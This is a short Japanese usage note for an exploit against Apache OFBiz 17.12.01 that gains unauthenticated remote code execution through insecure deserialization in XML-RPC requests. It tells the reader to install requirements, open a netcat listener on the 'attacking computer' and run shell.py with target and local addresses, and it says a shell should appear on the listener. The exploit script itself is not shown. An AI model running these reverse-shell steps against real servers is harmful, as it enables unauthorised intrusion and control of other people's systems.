
ApacheOfBiz 17.12.01 - 未承認のリモートコード実行
ApacheOfBiz 17.12.01 - 未承認のリモートコード実行
XML-RPCリクエストは安全でないデシリアライゼーションに対して脆弱です。
pip3 install -r requeriments.txt
nc -nlvp <port> # 攻撃用コンピュータ
python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>
ncリスナーにシェルが表示されるはずです
